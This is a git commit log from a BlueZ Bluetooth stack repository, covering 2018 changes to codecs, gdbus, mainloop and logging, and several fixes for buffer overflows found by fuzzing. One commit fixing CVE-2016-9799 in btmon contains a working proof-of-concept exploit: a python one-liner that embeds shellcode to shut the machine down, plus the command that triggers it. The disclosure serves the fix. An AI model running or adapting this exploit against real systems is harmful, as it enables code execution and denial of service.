platform/upstream/bluez.git
4 years agoa2dp-codecs: Define a2dp_vendor_codec_t struct in endian neutral way
Pali Rohár [Sun, 23 Dec 2018 10:40:17 +0000 (11:40 +0100)]
a2dp-codecs: Define a2dp_vendor_codec_t struct in endian neutral way

And define new macros A2DP_GET_VENDOR_ID(), A2DP_GET_CODEC_ID() and
A2DP_SET_VENDOR_ID_CODEC_ID() for easily filling a2dp_vendor_codec_t
struct.

Change-Id: Ia517e52fce660b3e5f073a3009e460da0ca7a15a
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoa2dp-codecs & avinfo: Fix parsing MPEG bit rate values
Pali Rohár [Sun, 23 Dec 2018 10:40:16 +0000 (11:40 +0100)]
a2dp-codecs & avinfo: Fix parsing MPEG bit rate values

Redefine bitrate field in a2dp_mpeg_t struct in endian neutral way and
separate vbr field according to A2DP specification. Define new macros
MPEG_GET_BITRATE() and MPEG_SET_BITRATE() for manipulating with bitrate
like for a2dp_aac_t struct.

And fix meaning of bitrate field. According to A2DP specification, it is
bitrate index, not bitrate itself. According to MPEG specification, each
MPEG layer have different bitrates for bitrate indexes. Therefore define
correctly bitrates for Layers 1, 2 and 3.

This fixes problems with parsing bitrate field in a2dp_mpeg_t struct as it
was broken due to endianity and it was broken for Layer 1 and 2 as bitrate
definitions was for Layer 3.

Change-Id: Ied2e860f5c54ccd6bbef7770959f5ac553022a56
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoa2dp-codecs: Fix codec id for ATRAC
Pali Rohár [Sun, 23 Dec 2018 10:40:15 +0000 (11:40 +0100)]
a2dp-codecs: Fix codec id for ATRAC

According to Bluetooth Assigned Numbers for Audio/Video ATRAC has codec id 0x04.
See: https://www.bluetooth.com/specifications/assigned-numbers/audio-video

Change-Id: Ia45a0ec8a415f73f6180d3b684ee39c0c70a5e57
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoa2dp-codecs: Add SBC prefix for MIN/MAX_BITPOOL constants
Pali Rohár [Sun, 23 Dec 2018 10:40:14 +0000 (11:40 +0100)]
a2dp-codecs: Add SBC prefix for MIN/MAX_BITPOOL constants

Those two constants are SBC codec specific.

Change-Id: I184ab28fcc4566d02449ed07ac68c3e26d4c41cf
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoavinfo: Show Vendor Specific Data
Pali Rohár [Sun, 23 Dec 2018 10:40:13 +0000 (11:40 +0100)]
avinfo: Show Vendor Specific Data

Change-Id: I6ac47da5f045b7214531192d5e58c82ddb3eb9b8
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoavinfo: Fix buffer overflow when parsing broken/malicious data
Pali Rohár [Sun, 23 Dec 2018 10:40:12 +0000 (11:40 +0100)]
avinfo: Fix buffer overflow when parsing broken/malicious data

Check size of buffer prior casting it to struct.

Change-Id: I8a3ee8d8bf2dfef7b37a7075f2062804268de639
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agounit/test-gdbus-client: Fix using invalid interface name
Luiz Augusto von Dentz [Tue, 18 Dec 2018 15:01:05 +0000 (12:01 -0300)]
unit/test-gdbus-client: Fix using invalid interface name

Each element must only contain the ASCII characters "[A-Z][a-z][0-9]_"
and must not begin with a digit so '-' cannot be used.

Change-Id: I176162c288973b9db672bbb9c5eacd896dd94b41
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogdbus: Split validation of object path and interface
Luiz Augusto von Dentz [Tue, 18 Dec 2018 15:02:22 +0000 (12:02 -0300)]
gdbus: Split validation of object path and interface

This splits the validation of object and interface so and error is
properly printed for each of those.

Change-Id: Ic936f70c7b94b9ec51c047d10d90628c66893cde
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogdbus: Make sure the object path and interface are valid
Luiz Augusto von Dentz [Wed, 5 Dec 2018 23:57:51 +0000 (20:57 -0300)]
gdbus: Make sure the object path and interface are valid

D-Bus object path and interface must be validate otherwise it can cause
errors as follow:

0  0xb7f67ab1 in __kernel_vsyscall ()
1  0xb7ca1cc1 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
2  0xb7ca50ee in abort () at abort.c:92
3  0xb7e30ba5 in _dbus_abort () at dbus-sysdeps.c:94
4  0xb7e267a6 in _dbus_warn_check_failed (
    format=0xb7e36cd4 "arguments to %s() were incorrect, assertion \"%s\" failed in file %s line %d.\nThis is normally a bug in some application using the D-Bus library.\n") at dbus-internals.c:290
5  0xb7e16d9f in dbus_message_iter_append_basic (iter=0xbf864400, type=111,
    value=0xd70940) at dbus-message.c:2586
6  0x004fcdec in emit_interfaces_added (user_data=0xd70938)
    at gdbus/object.c:574

Change-Id: I84ad3ffe13e16d6275fb5f9df4013a4804ad2aaf
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoavrcp: Fix error creating media items
Luiz Augusto von Dentz [Wed, 5 Dec 2018 12:17:02 +0000 (09:17 -0300)]
avrcp: Fix error creating media items

Don't use item name in the object path since it would need to be
properly escaped if the remote stack uses UID 0 even though it is
invalid to have 0 as UID:

AVRCP 1.6.1, page 84:

  'The value of UID=0x0 is a special value used only to request
   the metadata for the currently playing media using the
   GetElementAttributes command and shall not be used for any item
   in a folder.'

Change-Id: Id31a0ed0ebab207b5552466a051f1b9161d7b76b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Register GATT and GAP services as SDP records
Luiz Augusto von Dentz [Tue, 4 Dec 2018 19:17:57 +0000 (16:17 -0300)]
gatt: Register GATT and GAP services as SDP records

This ensures that GATT and GAP services can be discover over SDP as well
as over GATT.

Change-Id: Ibf4ac7da55ba8eb63d5e5eacf0b8ded6ae4f1aa5
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/tester: Make use of mainloop_run_with_signal
Luiz Augusto von Dentz [Wed, 28 Nov 2018 14:54:40 +0000 (16:54 +0200)]
shared/tester: Make use of mainloop_run_with_signal

This don't require setting up signalfd.

Change-Id: I2bc0b624e5768fc64085438054e3679cf8cbbe9b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agocore: Make use of mainloop_run_with_signal
Luiz Augusto von Dentz [Wed, 28 Nov 2018 14:27:38 +0000 (16:27 +0200)]
core: Make use of mainloop_run_with_signal

This don't require setting up signalfd.

Change-Id: I662835f2fb18e3d30aca89dc2150b977a46db939
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/mainloop: Remove mainloop_set_signal
Luiz Augusto von Dentz [Wed, 28 Nov 2018 14:01:40 +0000 (16:01 +0200)]
shared/mainloop: Remove mainloop_set_signal

This removes mainloop_set_signal and replaces it usage with
mainloop_run_with_signal.

Change-Id: I7354a76436348520ee814c513294fdfe80a33c41
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/mainloop: Add mainloop_run_with_signal
Luiz Augusto von Dentz [Wed, 28 Nov 2018 13:41:35 +0000 (15:41 +0200)]
shared/mainloop: Add mainloop_run_with_signal

This consolidates the handling of signalfd in similar ways as ELL does.

Change-Id: Iaf082f7534a7444a7b3fc29ed5a6423f666f3f86
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/timeout-glib: Check 0 id when removing timeout
Luiz Augusto von Dentz [Mon, 26 Nov 2018 16:01:47 +0000 (18:01 +0200)]
shared/timeout-glib: Check 0 id when removing timeout

If the id is 0 that makes it is invalid already.

Change-Id: Icd116c07be4db784ee8cd0be66560b14a74bc069
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agocore: Use mainloop_sd_notify instead of sd_notify
Luiz Augusto von Dentz [Mon, 26 Nov 2018 15:48:50 +0000 (17:48 +0200)]
core: Use mainloop_sd_notify instead of sd_notify

mainloop_sd_notify takes care of sending the messages to NOTIFY_SOCKET
and includes the handling of WATCHDOG_USEC as well.

Change-Id: Ibaf2e3af9cd0d492cd10576f671e16d54dcca287
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agotool/btmon-logger: Use mainloop_notify instead of sd_notify
Luiz Augusto von Dentz [Mon, 26 Nov 2018 14:23:37 +0000 (16:23 +0200)]
tool/btmon-logger: Use mainloop_notify instead of sd_notify

mainloop_notify takes care of sending the messages to NOTIFY_SOCKET and
includes the handling of WATCHDOG_USEC as well.

Change-Id: Iea22016e179e2714e94ac89dfa8c06d21573c277
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshare/mainloop: Add watchdog support
Luiz Augusto von Dentz [Mon, 26 Nov 2018 14:16:15 +0000 (16:16 +0200)]
share/mainloop: Add watchdog support

This adds watchdog notification support by sending "WATCHDOG=1" twice
as frequent as required by WATCHDOG_USEC.

Change-Id: I713883290a03961276d8f981818abbc922018bd0
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshare/mainloop: Add handling of NOTIFY_SOCKET
Luiz Augusto von Dentz [Mon, 26 Nov 2018 13:54:00 +0000 (15:54 +0200)]
share/mainloop: Add handling of NOTIFY_SOCKET

This adds handling of systemd NOTIFY_SOCKET so application using
mainloop instance do properly notify systemd what is their state.

Change-Id: Ie58d7641eb76c8e77482ad78e86ed0ecac0e0ae5
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agotools/btpclient: Fix compile warning with strncpy
Tedd Ho-Jeong An [Thu, 29 Nov 2018 23:24:26 +0000 (15:24 -0800)]
tools/btpclient: Fix compile warning with strncpy

This patch fixes the boundry warning-to-error in GCC 8.1.1 with strncpy.

Change-Id: I606199afaa5de1dc56f043160b1f6a53f3092b81
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agotools: Use l_main_run_with_signal instead of open coding it
Marcel Holtmann [Mon, 3 Dec 2018 18:48:08 +0000 (19:48 +0100)]
tools: Use l_main_run_with_signal instead of open coding it

Change-Id: Idca5ab5133fad95a9480c0216ad377c777d96f61
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmgmt: Add BREDR PHYs in PHY Configuration commands
Jaganath Kanakkassery [Fri, 9 Nov 2018 06:37:09 +0000 (12:07 +0530)]
btmgmt: Add BREDR PHYs in PHY Configuration commands

This basically adds BREDR packet types also in the PHY confiuration
commands & events and makes the PHYs 32 bit so that it can be
extended in future. This also add configurable PHYs in the GetPhy
command wherein only those can be selected or deselected in SetPhy.

This also adds LE prefix for LE phys to make it more
descriptive

Change-Id: I77442839d02acc308078f355037820c11f026d00
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobuild: rename includedir to pkgincludedir
Jan Engelhardt [Sun, 25 Nov 2018 09:20:05 +0000 (10:20 +0100)]
build: rename includedir to pkgincludedir

This change is similar to commit 5.50-130-g78bce4800 and does the
same, but for includedir.

Change-Id: Ie9601a14e5375a5974f0a5f846dea5608f93786e
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshell: Fix artifacts when asking for user input
Luiz Augusto von Dentz [Thu, 22 Nov 2018 15:57:19 +0000 (17:57 +0200)]
shell: Fix artifacts when asking for user input

Instead of printing a message use set the new prompt so it is carried
over when new lines are printed. Unfortunately this has some drawbacks
as apparently readline is not really able to redisplay properly if the
prompt contain colors.

Change-Id: Iab1a1f1d485b89e446631b5f1554fbc829359e06
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agolog: Use shared log code
Luiz Augusto von Dentz [Thu, 15 Nov 2018 13:53:46 +0000 (15:53 +0200)]
log: Use shared log code

Use bt_log_* to send messages to the logging channel.

Change-Id: I7d6fccb39c4570e68929d677082f4625990298a4
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/shell: Add option to print to monitor
Luiz Augusto von Dentz [Tue, 20 Nov 2018 13:23:49 +0000 (15:23 +0200)]
shared/shell: Add option to print to monitor

This adds option -m/--monitor which send output to btmon using
libshared bt_log:

= bluetoothctl: power on
= bluetoothctl: Changing power on succeeded

Change-Id: If99dc6a7090ed9b477beafe4b90fa59f357fb8b3
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/tester: Make use of shared log
Luiz Augusto von Dentz [Thu, 15 Nov 2018 13:52:07 +0000 (15:52 +0200)]
shared/tester: Make use of shared log

Use bt_monitor_* to send messages to the logging channel.

Change-Id: I96565c0b15441d7c8753b4b5c48397d6ef8719bd
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/log: Add common code to interface with logging channel
Luiz Augusto von Dentz [Wed, 7 Nov 2018 12:26:50 +0000 (14:26 +0200)]
shared/log: Add common code to interface with logging channel

This enables any code using shared to log information using the logging
channel which can then be decoded by the likes of btmon.

Change-Id: Ic910de61ec3b4f291f0ceb801a5b5a3925c9f0b2
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoclient: Switch from write to sendmsg for Acquire*
Luiz Augusto von Dentz [Mon, 19 Nov 2018 13:36:15 +0000 (15:36 +0200)]
client: Switch from write to sendmsg for Acquire*

Use sendmsg with MSG_NOSIGNAL to prevent crashes involving SIGPIPE.

Change-Id: Ib461b3ede9ead18e832a66f75ff5fde06e37cc83
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agodoc/gatt-api: Restrict supported file descriptors
Luiz Augusto von Dentz [Mon, 19 Nov 2018 12:19:31 +0000 (14:19 +0200)]
doc/gatt-api: Restrict supported file descriptors

Only support sockets with AcquireWrite/AcquireNotify since pipe don't
work with sendmsg therefore MSG_NOSIGNAL cannot be used.

Change-Id: If0767e9087f875ac2e19a7e4853973f49ca8ad4b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Fix invalid read when disconnecting
Luiz Augusto von Dentz [Mon, 19 Nov 2018 15:19:39 +0000 (17:19 +0200)]
gatt: Fix invalid read when disconnecting

In case there is a client of AcquireNotify and a disconnect happens the
code not only have to free the client object but also destroy the io
associated with it, for this reason the client object cannot be freed
until the io is destroyed otherwise it may lead to the following error:

Invalid read of size 4
   at 0x63920: notify_io_destroy (gatt-client.c:1461)
   by 0x63EDB: pipe_io_destroy (gatt-client.c:1082)
   by 0x6405B: characteristic_free (gatt-client.c:1663)
   by 0x81F33: remove_interface (object.c:667)
   by 0x826CB: g_dbus_unregister_interface (object.c:1391)
   by 0x85D2B: queue_remove_all (queue.c:354)
   by 0x635F7: unregister_service (gatt-client.c:1893)
   by 0x85CF7: queue_remove_all (queue.c:339)
   by 0x661DF: btd_gatt_client_service_removed (gatt-client.c:2199)
   by 0x695CB: gatt_service_removed (device.c:3747)
   by 0x85B17: queue_foreach (queue.c:220)
   by 0x91283: notify_service_changed (gatt-db.c:280)
   by 0x91283: gatt_db_service_destroy (gatt-db.c:291)
 Address 0x515ed48 is 0 bytes inside a block of size 20 free'd
   at 0x483EAD0: free (vg_replace_malloc.c:530)
   by 0x85D2B: queue_remove_all (queue.c:354)
   by 0x636D3: unregister_characteristic (gatt-client.c:1741)
   by 0x85D2B: queue_remove_all (queue.c:354)
   by 0x635F7: unregister_service (gatt-client.c:1893)
   by 0x85CF7: queue_remove_all (queue.c:339)
   by 0x661DF: btd_gatt_client_service_removed (gatt-client.c:2199)
   by 0x695CB: gatt_service_removed (device.c:3747)
   by 0x85B17: queue_foreach (queue.c:220)
   by 0x91283: notify_service_changed (gatt-db.c:280)
   by 0x91283: gatt_db_service_destroy (gatt-db.c:291)
   by 0x85D2B: queue_remove_all (queue.c:354)
   by 0x91387: gatt_db_clear_range (gatt-db.c:475)

Change-Id: If5d5159c7fc59f4f3b88afb863eb0b0644ddee09
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoavctp: Fix possible crash when accepting browsing channel
Luiz Augusto von Dentz [Wed, 14 Nov 2018 11:35:37 +0000 (13:35 +0200)]
avctp: Fix possible crash when accepting browsing channel

In order to stop the bt_io_accept from calling the callback with
invalid session, if that is disconnected in the meantime, create the
channel so it can properly be destroyed thus stopping the callback from
being called.

Change-Id: If89847141f3062361cbc0b8a1235eeee0e7edf34
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agounit/test-sdp: Add robustness test for continuation state
Luiz Augusto von Dentz [Thu, 1 Nov 2018 13:59:23 +0000 (15:59 +0200)]
unit/test-sdp: Add robustness test for continuation state

This adds a test for invalid continuation state:

/TP/SERVER/SA/ROB/BI-01-C - init
/TP/SERVER/SA/ROB/BI-01-C - setup
/TP/SERVER/SA/ROB/BI-01-C - setup complete
/TP/SERVER/SA/ROB/BI-01-C - run
  test-sdp: < 02 00 01 00 16 35 11 1c 00 00 01 00 00 00 10 00  .....5..........
  test-sdp:   80 00 00 80 5f 9b 34 fb 00 01 00                 ...._.4....
bluetoothd[26193]: process_request: Got a svc srch req
bluetoothd[26193]: extract_des: Seq type : 53
bluetoothd[26193]: extract_des: Data size : 17
bluetoothd[26193]: extract_des: Data type: 0x1c
bluetoothd[26193]: extract_des: No of elements : 1
bluetoothd[26193]: service_search_req: Expected count: 1
bluetoothd[26193]: service_search_req: Bytes scanned : 19
bluetoothd[26193]: sdp_cstate_get: Continuation State size : 0
bluetoothd[26193]: service_search_req: Checking svcRec : 0x0
bluetoothd[26193]: service_search_req: Checking svcRec : 0x1
bluetoothd[26193]: service_search_req: Checking svcRec : 0x10000
bluetoothd[26193]: service_search_req: Match count: 1
bluetoothd[26193]: process_request: Sending rsp. status 0
bluetoothd[26193]: process_request: Bytes Sent : 14
  test-sdp: > 03 00 01 00 09 00 01 00 01 00 01 00 00 00        ..............
  test-sdp: < 04 00 01 00 0f 00 01 00 00 00 07 35 06 09 00 00  ...........5....
  test-sdp:   09 00 01 00                                      ....
bluetoothd[26193]: process_request: Got a svc attr req
bluetoothd[26193]: extract_des: Seq type : 53
bluetoothd[26193]: extract_des: Data size : 6
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 1
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 2
bluetoothd[26193]: sdp_cstate_get: Continuation State size : 0
bluetoothd[26193]: service_attr_req: SvcRecHandle : 0x10000
bluetoothd[26193]: service_attr_req: max_rsp_size : 7
bluetoothd[26193]: extract_attrs: Entries in attr seq : 2
bluetoothd[26193]: extract_attrs: AttrDataType : 9
bluetoothd[26193]: extract_attrs: AttrDataType : 9
bluetoothd[26193]: service_attr_req: Creating continuation state of size : 18
bluetoothd[26193]: sdp_set_cstate_pdu: Non null sdp_cstate_t id : 0x5bdb0511
bluetoothd[26193]: process_request: Sending rsp. status 0
bluetoothd[26193]: process_request: Bytes Sent : 23
  test-sdp: > 05 00 01 00 12 00 07 35 10 09 00 00 0a 00 08 11  .......5........
  test-sdp:   05 db 5b 07 00 00 00                             ..[....
  test-sdp: < 04 00 02 00 17 00 01 00 00 00 07 35 06 09 00 00  ...........5....
  test-sdp:   09 00 01 08 11 05 db 5b ff ff 00 00              .......[....
bluetoothd[26193]: process_request: Got a svc attr req
bluetoothd[26193]: extract_des: Seq type : 53
bluetoothd[26193]: extract_des: Data size : 6
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 1
bluetoothd[26193]: extract_des: Data type: 0x09
bluetoothd[26193]: extract_des: No of elements : 2
bluetoothd[26193]: sdp_cstate_get: Continuation State size : 8
bluetoothd[26193]: sdp_cstate_get: Cstate TS : 0x5bdb0511
bluetoothd[26193]: sdp_cstate_get: Bytes sent : 65535
bluetoothd[26193]: service_attr_req: SvcRecHandle : 0x10000
bluetoothd[26193]: service_attr_req: max_rsp_size : 7
bluetoothd[26193]: NULL cache buffer and non-NULL continuation state
bluetoothd[26193]: process_request: Sending rsp. status 5
bluetoothd[26193]: process_request: Bytes Sent : 7
  test-sdp: > 01 00 02 00 02 00 05                             .......
/TP/SERVER/SA/ROB/BI-01-C - test passed
/TP/SERVER/SA/ROB/BI-01-C - teardown
/TP/SERVER/SA/ROB/BI-01-C - teardown complete
/TP/SERVER/SA/ROB/BI-01-C - done

Change-Id: I9312545d675dab69e64d22779e02ac7da923bb42
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agosdp: Fix buffer overflow
Luiz Augusto von Dentz [Fri, 28 Sep 2018 13:08:32 +0000 (16:08 +0300)]
sdp: Fix buffer overflow

sdp_append_buf shall check if there is enough space to store the data
before copying it.

An independent security researcher, Julian Rauchberger, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure
program.

Change-Id: I15d089ecda58b507776767f595c3006cd3f8b90c
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agosdp: Fix not checking if cstate length
Luiz Augusto von Dentz [Fri, 28 Sep 2018 12:04:42 +0000 (15:04 +0300)]
sdp: Fix not checking if cstate length

cstate length should be smaller than cached length otherwise the
request shall be considered invalid as the data is not within the
cached buffer.

An independent security researcher, Julian Rauchberger, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure
program.

Change-Id: I16873b4ca1eda39c28d6737a66db08a6206c6bfb
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Decode error response
Luiz Augusto von Dentz [Thu, 1 Nov 2018 13:55:12 +0000 (15:55 +0200)]
monitor: Decode error response

This adds decoding for the error code in the error response:

> test-sdp: User Data RX
      Channel: 0 len 7 [PSM 1 mode 0] {chan 0}
      SDP: Error Response (0x01) tid 2 len 2
        Error code: Invalid Continuation State (0x0005)

Change-Id: Ie72b90f076e36a75a9fef91cdef235070ad28d1b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agohcidump: Fix set_ext_ctrl() global buffer overflow
Cho, Yu-Chen [Wed, 31 Oct 2018 08:15:08 +0000 (16:15 +0800)]
hcidump: Fix set_ext_ctrl() global buffer overflow

Fix set_ext_ctrl() global buffer overflow.

Change-Id: I7b03dc961b1c74d372817bedb35d11b39d475bda
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agohcidump:fixed hci frame dump stack-buffer-overflow
Cho, Yu-Chen [Wed, 31 Oct 2018 08:15:07 +0000 (16:15 +0800)]
hcidump:fixed hci frame dump stack-buffer-overflow

hci_dump() didn't check the length of frame, and it would be
a stack-buffer-overflow error.

Change-Id: I9ed90053c242aa174485c3038ada9a182b3004ca
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: Add colors to data status in extended adv report
Łukasz Rymanowski [Wed, 24 Oct 2018 10:17:18 +0000 (12:17 +0200)]
btmon: Add colors to data status in extended adv report

This patch gives color indicators to data status in extended
advertising reports. This gives better visibility on which advertising
events were completed or truncated.

Change-Id: I79a3cd8eec85eb08ad07a6083ee33a8e77b0ea5e
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Fix not removing disconnect handler properly
Luiz Augusto von Dentz [Mon, 29 Oct 2018 13:13:25 +0000 (15:13 +0200)]
gatt: Fix not removing disconnect handler properly

Previous patch did not really fixed the crash since the bt_server would
be freed already which makes bt_att instance to be passed as NULL to
bt_att_unregister_disconnect which makes it not the take the expected
action.

Change-Id: Icd15b693e6ea59eb080f76d1735c9f537d61ba3b
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agogatt: Fix crash on disconnect
Luiz Augusto von Dentz [Thu, 25 Oct 2018 07:09:37 +0000 (10:09 +0300)]
gatt: Fix crash on disconnect

This fix a crash when ATT disconnects causing the following trace:

 Invalid read of size 8
    at 0x47CD9A: att_disconnected (gatt-database.c:335)
    by 0x4E04F5: disconn_handler (att.c:539)
    by 0x4DACD0: queue_foreach (queue.c:220)
    by 0x4E23D8: disconnect_cb (att.c:592)
    by 0x4F0A58: watch_callback (io-glib.c:170)
    by 0x50D788C: g_main_context_dispatch (in /usr/lib64/libglib-2.0.so.0.5600.3)
    by 0x50D7C57: ??? (in /usr/lib64/libglib-2.0.so.0.5600.3)
    by 0x50D7F81: g_main_loop_run (in /usr/lib64/libglib-2.0.so.0.5600.3)
    by 0x40D336: main (main.c:808)
  Address 0x9aed3c0 is 0 bytes inside a block of size 40 free'd
    at 0x4C2FDAC: free (vg_replace_malloc.c:530)
    by 0x47CE78: att_disconnected (gatt-database.c:358)
    by 0x47F9FF: btd_gatt_database_att_disconnected (gatt-database.c:3540)
    by 0x4AAB8E: gatt_server_cleanup (device.c:584)
    by 0x4AAC26: attio_cleanup (device.c:601)
    by 0x4ADDF1: att_disconnected_cb (device.c:4865)
    by 0x4E04F5: disconn_handler (att.c:539)
    by 0x4DACD0: queue_foreach (queue.c:220)
    by 0x4E23D8: disconnect_cb (att.c:592)
    by 0x4F0A58: watch_callback (io-glib.c:170)
    by 0x50D788C: g_main_context_dispatch (in /usr/lib64/libglib-2.0.so.0.5600.3)
    by 0x50D7C57: ??? (in /usr/lib64/libglib-2.0.so.0.5600.3)

Change-Id: Ib180cf7f7abb076cc94d2e08434a0cdf91134bd0
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agoshared/gatt-server: Add bt_gatt_server_get_att
Luiz Augusto von Dentz [Wed, 25 Apr 2018 12:29:51 +0000 (15:29 +0300)]
shared/gatt-server: Add bt_gatt_server_get_att

This adds bt_gatt_server_get_att which can be used to get the bt_att
instance attached to the server.

Change-Id: If00def71f2ec7369162b8808524836fcd59c1b44
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agomonitor: Use static inline for functions in header files
Marcel Holtmann [Sat, 20 Oct 2018 05:23:11 +0000 (07:23 +0200)]
monitor: Use static inline for functions in header files

Change-Id: Ic65292f68c4e74778780dce4a1163d2e9bef7b9c
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: fix segfault caused by buffer overflow
Matias Karhumaa [Tue, 16 Oct 2018 20:24:15 +0000 (23:24 +0300)]
btmon: fix segfault caused by buffer overflow

Buffer overflow vulnerability in monitor/sdp.c SDP continuation handling
caused btmon to crash. This happens in global static buffer which makes
it non-trivial to exploit.

This is nasty bug in a way that this can be triggered also over the air
by sending malformed SDP Search Attribute request to device running
btmon.

This crash was foung by fuzzing btmon with AFL. Seems to be reproducible
also with Synopsys Defensics SDP Server suite.

Change-Id: Ie149945cd95f6686183944e358cf25b485c769c4
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: fix segfault caused by integer undeflow
Matias Karhumaa [Tue, 16 Oct 2018 20:23:12 +0000 (23:23 +0300)]
btmon: fix segfault caused by integer undeflow

Fix segfault caused by integer underflow. Fix is to check that
rsp->num_codecs + 3 is not bigger than size before subtracting.

Crash was found by fuzzing btmon with AFL.

Change-Id: I9af6ee12b4bf58d33ee81412ddd6c47ef49acac8
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: fix segfault caused by integer underflow
Matias Karhumaa [Tue, 16 Oct 2018 20:22:42 +0000 (23:22 +0300)]
btmon: fix segfault caused by integer underflow

Fix segfault caused by integer underflow in set_event_filter_cmd().
Fix is to check that size is big enough before subtracting to prevent
underflow.

Crash was found by fuzzing btmon with AFL.

Change-Id: I2e8c45af686bc86beb20221118240958afa58426
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: fix stack buffer overflow
Matias Karhumaa [Tue, 16 Oct 2018 20:21:50 +0000 (23:21 +0300)]
btmon: fix stack buffer overflow

Arbitrary code execution vulnerability was discovered in btmon.
pklg_read_hci function read from file attacker controllable
amount of data which caused stack buffer overflow.

Fixes old and previously unfixed CVE-2016-9799.

Initially this was reported by op7ic:
https://www.spinics.net/lists/linux-bluetooth/msg68898.html

Later this was re-discovered by fuzzing btmon with AFL.

Proof-of-concept exploit that shutowns the machine:
$ python -c 'print "\x00\x00\x0c\x10"+ "\x90"*609 +"\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"+ "\x90"*847 +"\xb0\xda\xff\xff\xff\x7f\x00\x00"' > exploit
$ ./btmon -r exploit

Proof of concept requires that ASLR is disabled and following CFLAGS are
set: -fno-stack-protector -zexecstack

Change-Id: I75934ef2c759e5dab3ed025d4d8bf5041523a2de
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: fix multiple segfaults
Matias Karhumaa [Tue, 16 Oct 2018 20:22:16 +0000 (23:22 +0300)]
btmon: fix multiple segfaults

Fix multiple segfaults caused by buffer over-read in packet_hci_command,
packet_hci_event and packet_hci_acldata. Fix is to check that index is
not bigger than MAX_INDEX before accessing index_list.

Crashes were found by fuzzing btmon with AFL.

Change-Id: Iaba0be9da71154eaeff3be86e8afa5eeb74dd354
Signed-off-by: himanshu <h.himanshu@samsung.com>
4 years agobtmon: fix segfault caused by buffer over-read
Matias Karhumaa [Tue, 16 Oct 2018 20:19:38 +0000 (23:19 +0300)]
btmon: fix segfault caused by buffer over-read

Fix segfault caused by buffer over-read. Check that index is not
bigger than MAX_INDEX.

This bug was found by fuzzing with AFL.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000420bb8 in print_packet (tv=<optimized out>, cred=<optimized out>, ident=<optimized out>, index=<optimized out>, channel=<optimized out>, color=<optimized out>,
    label=<optimized out>, text=<optimized out>, extra=<optimized out>) at monitor/packet.c:317
warning: Source file is more recent than executable.
317 index_list[index].frame != last_frame) {
(gdb) bt
 #0  0x0000000000420bb8 in print_packet (tv=<optimized out>, cred=<optimized out>, ident=<optimized out>, index=<optimized out>, channel=<optimized out>, color=<optimized out>,
    label=<optimized out>, text=<optimized out>, extra=<optimized out>) at monitor/packet.c:317
 #1  0x000000000041a8c3 in packet_new_index (tv=<optimized out>, index=<optimized out>, name=0x7fffffffda68 "rsion 4.18.0-matias-patch2 (x86_64)", label=<optimized out>,
    type=<optimized out>, bus=<optimized out>) at monitor/packet.c:9818
